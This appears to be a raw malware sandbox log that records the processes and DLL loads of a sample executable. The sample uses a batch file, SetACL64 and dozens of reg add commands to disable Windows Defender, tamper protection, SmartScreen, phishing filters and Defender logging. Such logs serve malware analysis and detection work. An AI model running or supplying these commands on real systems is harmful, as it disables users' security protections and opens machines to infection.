Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: dwmapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: oleacc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: shfolder.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
